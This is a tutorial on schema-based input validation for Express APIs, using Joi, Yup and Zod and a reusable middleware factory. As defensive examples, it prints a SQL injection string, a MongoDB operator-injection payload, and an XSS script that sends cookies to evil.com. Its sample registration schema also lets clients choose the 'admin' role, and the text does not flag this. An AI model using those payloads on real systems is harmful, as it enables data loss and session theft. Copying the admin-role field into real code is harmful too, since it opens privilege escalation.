Advanced · 25 min read

Data Validation

Validate incoming request data with schema validation to protect your API from bad input.

Why Validate?

There is a golden rule in backend development: never trust client input. Every piece of data that arrives from a client — whether it comes from a web form, a mobile app, a CLI tool, or another API — must be treated as potentially malicious, malformed, or simply wrong.

Users make mistakes. They leave required fields empty, enter their phone number in the email field, submit a negative age, paste a novel into a field with a 100-character limit, or double-click the submit button and send the same data twice.

Attackers send malicious data. Without validation, your API is vulnerable to:

  • SQL Injection: An attacker sends '; DROP TABLE users; -- as a username. If that string is concatenated directly into a SQL query, the injected statement can execute and drop the table. Parameterized queries remain the primary defense; validation narrows what can reach them.
  • NoSQL Injection: An attacker sends {"$gt": ""} as a password in a MongoDB query. If the value is passed straight into the query, the $gt operator matches any non-empty password, so the attacker can log in as any user.
  • Cross-Site Scripting (XSS): An attacker submits <script>document.location='http://evil.com/steal?cookie='+document.cookie</script> as their name. If you render this in HTML without escaping, it executes in the browser of every user who views that page.
  • Denial of Service (resource exhaustion): An attacker sends an enormous payload, such as a multi-gigabyte string in a name field, to exhaust your server's memory and crash it. Body-size limits and maximum-length rules reject such input early.
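The NoSQL case above comes down to type confusion: the code expects a string but receives an object carrying a query operator. Here is a minimal sketch, with no database involved, of how a plain type check at the boundary stops it. The helper name `isSafeCredential`, the 256-character limit, and the sample payloads are illustrative assumptions, not part of any library.

```javascript
// Hypothetical helper: accept only non-empty strings of bounded length.
function isSafeCredential(value, maxLength = 256) {
  return typeof value === 'string' && value.length > 0 && value.length <= maxLength;
}

// What a JSON body parser would hand to the route for two different requests.
const honestBody = JSON.parse('{"username": "ada", "password": "s3cret-pass"}');
const attackBody = JSON.parse('{"username": "ada", "password": {"$gt": ""}}');

// A naive truthiness check lets the operator object through...
const naiveCheck = (body) => Boolean(body.username && body.password);

// ...while the type check rejects it before it can reach a query.
const strictCheck = (body) =>
  isSafeCredential(body.username) && isSafeCredential(body.password);

console.log(naiveCheck(attackBody));  // true
console.log(strictCheck(attackBody)); // false
console.log(strictCheck(honestBody)); // true
```

The same length bound also rejects oversized strings, although a request body size limit is still needed to stop huge payloads before they are parsed at all.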

Validate at the API boundary. The right place to validate is at the entry point of your API, in a middleware function that runs before your controller. Validating as early as possible (often called failing fast) means invalid data never reaches your business logic or database layer. It is one layer in a defense-in-depth strategy, alongside measures such as parameterized queries and output escaping, not a replacement for them.

Do not rely solely on frontend validation. Frontend validation improves user experience (instant feedback), but it provides zero security. An attacker can bypass any frontend validation by sending requests directly to your API using curl, Postman, or a script. Your backend must validate everything independently, as if the frontend does not exist.

Manual Validation (The Hard Way)

Before we look at the right way to validate, let us see what manual validation looks like — and why it quickly becomes unmanageable.

Consider a user registration endpoint that requires a name, email, password, and optional age:

javascript
app.post('/users', (req, res) => {
  const { name, email, password, age } = req.body;
  const errors = [];

  // Name validation
  if (!name) {
    errors.push('Name is required');
  } else if (typeof name !== 'string') {
    errors.push('Name must be a string');
  } else if (name.trim().length < 2) {
    errors.push('Name must be at least 2 characters');
  } else if (name.trim().length > 50) {
    errors.push('Name must be at most 50 characters');
  }

  // Email validation
  if (!email) {
    errors.push('Email is required');
  } else if (typeof email !== 'string') {
    errors.push('Email must be a string');
  } else if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
    errors.push('Email must be a valid email address');
  }

  // Password validation
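  if (!password) {
    errors.push('Password is required');
  } else if (typeof password !== 'string') {
    // Without this check, a number or object would skip the length rule
    errors.push('Password must be a string');
  } else if (password.length < 8) {
    errors.push('Password must be at least 8 characters');
  }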

  // Age validation (optional)
  if (age !== undefined) {
    if (typeof age !== 'number' || !Number.isInteger(age)) {
      errors.push('Age must be an integer');
    } else if (age < 0 || age > 150) {
      errors.push('Age must be between 0 and 150');
    }
  }

  if (errors.length > 0) {
    return res.status(400).json({ errors });
  }

  // ... proceed with creating the user
});

That is roughly 35 lines of validation code for just 4 fields. Now imagine you have 20 endpoints, each with 5-10 fields. That is hundreds of lines of repetitive, error-prone, hard-to-maintain validation code scattered across your codebase. If you need to change how emails are validated, you have to update every file that checks an email. If you forget one check, you have a security hole.

There is a much better way.

Schema Validation Libraries

Schema validation libraries let you declare what valid data looks like, then validate any data against that declaration. Instead of writing imperative if/else chains, you define a schema once and reuse it everywhere.
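To make the declarative idea concrete before introducing a library, here is a deliberately tiny, hand-rolled sketch. The `userRules` shape and the `validateAgainst` function are invented for illustration and cover far less than a real schema library does.

```javascript
// Declarative description of valid data: one entry per field.
const userRules = {
  name:  { type: 'string', required: true, min: 2, max: 50 },
  email: { type: 'string', required: true, pattern: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  age:   { type: 'number', required: false, min: 0, max: 150 },
};

// Generic engine: walks the rules and collects at most one error per field.
function validateAgainst(rules, data) {
  const errors = [];
  for (const [field, rule] of Object.entries(rules)) {
    const value = data[field];
    if (value === undefined || value === null) {
      if (rule.required) errors.push({ field, message: `${field} is required` });
      continue;
    }
    if (typeof value !== rule.type) {
      errors.push({ field, message: `${field} must be a ${rule.type}` });
      continue;
    }
    // For strings the bounds apply to the length, for numbers to the value itself.
    const size = rule.type === 'string' ? value.length : value;
    if (rule.min !== undefined && size < rule.min) {
      errors.push({ field, message: `${field} is below the minimum of ${rule.min}` });
    } else if (rule.max !== undefined && size > rule.max) {
      errors.push({ field, message: `${field} is above the maximum of ${rule.max}` });
    } else if (rule.pattern && !rule.pattern.test(value)) {
      errors.push({ field, message: `${field} has an invalid format` });
    }
  }
  return { success: errors.length === 0, errors };
}

const good = validateAgainst(userRules, { name: 'Ada', email: 'ada@example.com', age: 36 });
const bad = validateAgainst(userRules, { name: 'A', email: 'not-an-email', age: '36' });

console.log(good.success);                   // true
console.log(bad.errors.map((e) => e.field)); // [ 'name', 'email', 'age' ]
```

The rules are data and the engine is written once, so adding a field or an endpoint means adding an entry rather than another if/else chain.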

Three popular libraries in the Node.js ecosystem are:

Joi: One of the oldest and most feature-rich options, created by the team behind the Hapi framework. It is very expressive and supports complex nested validation, custom error messages, and conditional validation, at the cost of a slightly larger bundle size.

javascript
const Joi = require('joi');
const schema = Joi.object({
  name: Joi.string().min(2).max(50).required(),
  email: Joi.string().email().required(),
  age: Joi.number().integer().min(0).max(150),
});

Yup: Inspired by Joi but designed with frontend use in mind (for example, React forms with Formik). It is lighter weight, supports async validation, and has good TypeScript support, which makes it common in full-stack JavaScript applications.

javascript
const yup = require('yup');
const schema = yup.object({
  name: yup.string().min(2).max(50).required(),
  email: yup.string().email().required(),
  age: yup.number().integer().min(0).max(150), // same 0-150 range as the Joi example
});

Zod: The newest of the three and the most TypeScript-focused. It infers TypeScript types from schemas automatically, so your validation and type definitions stay in sync, and it has become a popular choice for TypeScript projects.

javascript
const { z } = require('zod');
const schema = z.object({
  name: z.string().min(2).max(50),
  email: z.string().email(),
  age: z.number().int().min(0).max(150).optional(), // Zod fields are required unless marked optional
});

All three follow the same core principles: you define a schema declaratively, validate data against it, and get back either the validated data or a detailed list of errors. The schema serves as both validation logic AND documentation of your API's expected input format.

Schemas are composable — you can combine smaller schemas into larger ones, reuse common patterns (email, password, pagination), and extend schemas for different endpoints (createUser vs updateUser).

Validation Middleware Pattern

The cleanest way to integrate validation into Express is the validation middleware pattern. Instead of validating inside each controller, you create a reusable middleware factory that validates req.body against a schema before the request reaches the controller.

javascript
// middleware/validate.js
const validate = (schema) => {
  return (req, res, next) => {
    const result = schema.safeParse(req.body); // Zod syntax
    if (!result.success) {
      return res.status(400).json({
        status: 'error',
        message: 'Validation failed',
        errors: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
        })),
      });
    }
    req.body = result.data; // Replace body with validated & transformed data
    next();
  };
};

Usage in routes:

javascript
const { createUserSchema, updateUserSchema } = require('../schemas/user');

router.post('/users', validate(createUserSchema), userController.create);
router.patch('/users/:id', validate(updateUserSchema), userController.update);

This pattern has several powerful benefits:

  1. Controllers stay clean. By the time the request reaches your controller, the data is guaranteed to be valid. No validation code in controllers, ever.
  2. Consistent error format. Every validation error across your entire API returns the same JSON structure. Clients can parse errors predictably.
  3. Reusable schemas. Define a passwordSchema once and use it in both login and registration endpoints. Define an emailSchema and use it everywhere.
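  4. Type coercion. Many libraries can coerce types: if the client sends "25" for an age field, the schema can parse it to the number 25. In Zod this is opt-in through z.coerce, which is especially useful for query strings, where every value arrives as a string.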
  5. Self-documenting. The schema IS the documentation. Anyone reading createUserSchema knows exactly what fields the endpoint accepts, their types, and their constraints.

You can validate req.params and req.query with the same pattern by giving the factory a second argument that names the source to check, for example validate(schema, 'params') or validate(schema, 'query').
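One way to see the factory's behavior without starting a server is to call the middleware directly with stand-in objects. The sketch below assumes a two-argument `validate(schema, source)` variant. The hand-written `stubSchema` only mimics the `safeParse` result shape, and `makeFakeRes` builds a minimal stand-in for the Express response; both are illustrative and not real library objects.

```javascript
// Factory with a configurable source ('body', 'params', or 'query').
const validate = (schema, source = 'body') => (req, res, next) => {
  const result = schema.safeParse(req[source]);
  if (!result.success) {
    return res.status(400).json({
      status: 'error',
      message: 'Validation failed',
      errors: result.error.issues.map((issue) => ({
        field: issue.path.join('.'),
        message: issue.message,
      })),
    });
  }
  req[source] = result.data;
  next();
};

// Stand-in schema: requires a numeric-looking `id` and converts it to a number.
const stubSchema = {
  safeParse(input) {
    const id = Number(input && input.id);
    if (!Number.isInteger(id) || id < 1) {
      return {
        success: false,
        error: { issues: [{ path: ['id'], message: 'id must be a positive integer' }] },
      };
    }
    return { success: true, data: { id } };
  },
};

// Minimal response double that records what the middleware sent.
const makeFakeRes = () => ({
  statusCode: 200,
  body: null,
  status(code) { this.statusCode = code; return this; },
  json(payload) { this.body = payload; return this; },
});

// Valid params: next() is called and the string "42" has become the number 42.
const okReq = { params: { id: '42' } };
let nextCalled = false;
validate(stubSchema, 'params')(okReq, makeFakeRes(), () => { nextCalled = true; });
console.log(nextCalled, okReq.params); // true { id: 42 }

// Invalid params: the middleware responds with 400 and never calls next().
const badReq = { params: { id: 'abc' } };
const badRes = makeFakeRes();
let badNext = false;
validate(stubSchema, 'params')(badReq, badRes, () => { badNext = true; });
console.log(badNext, badRes.statusCode, badRes.body.errors[0].field); // false 400 id
```

Because the middleware depends only on an object with a `safeParse` method, the same check works for any schema, and controllers can be tested separately on the assumption that their input is already valid.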

Validation Middleware with Zod Schemas

javascript
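const express = require('express');
const { z } = require('zod');
// Controller module path is an assumption; adjust it to your project layout.
const userController = require('../controllers/user');

const router = express.Router();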

// ── Reusable Schema Pieces ──────────────────────────
const emailSchema = z.string().email('Invalid email format').toLowerCase();
const passwordSchema = z.string()
  .min(8, 'Password must be at least 8 characters')
  .regex(/[A-Z]/, 'Password must contain at least one uppercase letter')
  .regex(/[0-9]/, 'Password must contain at least one number');

// ── User Schemas ────────────────────────────────────
const createUserSchema = z.object({
  name: z.string().min(2, 'Name must be at least 2 characters').max(50),
  email: emailSchema,
  password: passwordSchema,
  age: z.number().int().min(0).max(150).optional(),
  role: z.enum(['user', 'admin']).default('user'),
  address: z.object({
    street: z.string().min(1),
    city: z.string().min(1),
    zipCode: z.string().regex(/^\d{5}$/, 'ZIP must be 5 digits'),
  }).optional(),
  tags: z.array(z.string()).max(10).default([]),
});

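const updateUserSchema = createUserSchema.partial();
// .partial() makes all fields optional, which suits PATCH updates.
// Caution: whether .default() values (role, tags) are still filled in for
// omitted fields depends on the Zod version; verify this so that a PATCH
// does not silently reset them.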

// ── Validation Middleware Factory ────────────────────
const validate = (schema, source = 'body') => {
  return (req, res, next) => {
    const result = schema.safeParse(req[source]);

    if (!result.success) {
      return res.status(400).json({
        status: 'error',
        message: 'Validation failed',
        errors: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
          code: issue.code,
        })),
      });
    }

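    // Replace raw data with validated + transformed data.
    // Note: in Express 5, req.query is a read-only getter, so for 'query'
    // store result.data elsewhere (for example on res.locals) instead.
    req[source] = result.data;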
    next();
  };
};

// ── Usage in Routes ─────────────────────────────────
// POST /users — validate body against createUserSchema
router.post('/users',
  validate(createUserSchema),
  userController.create
);

// PATCH /users/:id — validate body against partial schema
router.patch('/users/:id',
  validate(updateUserSchema),
  userController.update
);

// GET /users?page=1&limit=10 — validate query params
const paginationSchema = z.object({
  page: z.coerce.number().int().min(1).default(1),
  limit: z.coerce.number().int().min(1).max(100).default(10),
});
router.get('/users',
  validate(paginationSchema, 'query'),
  userController.getAll
);
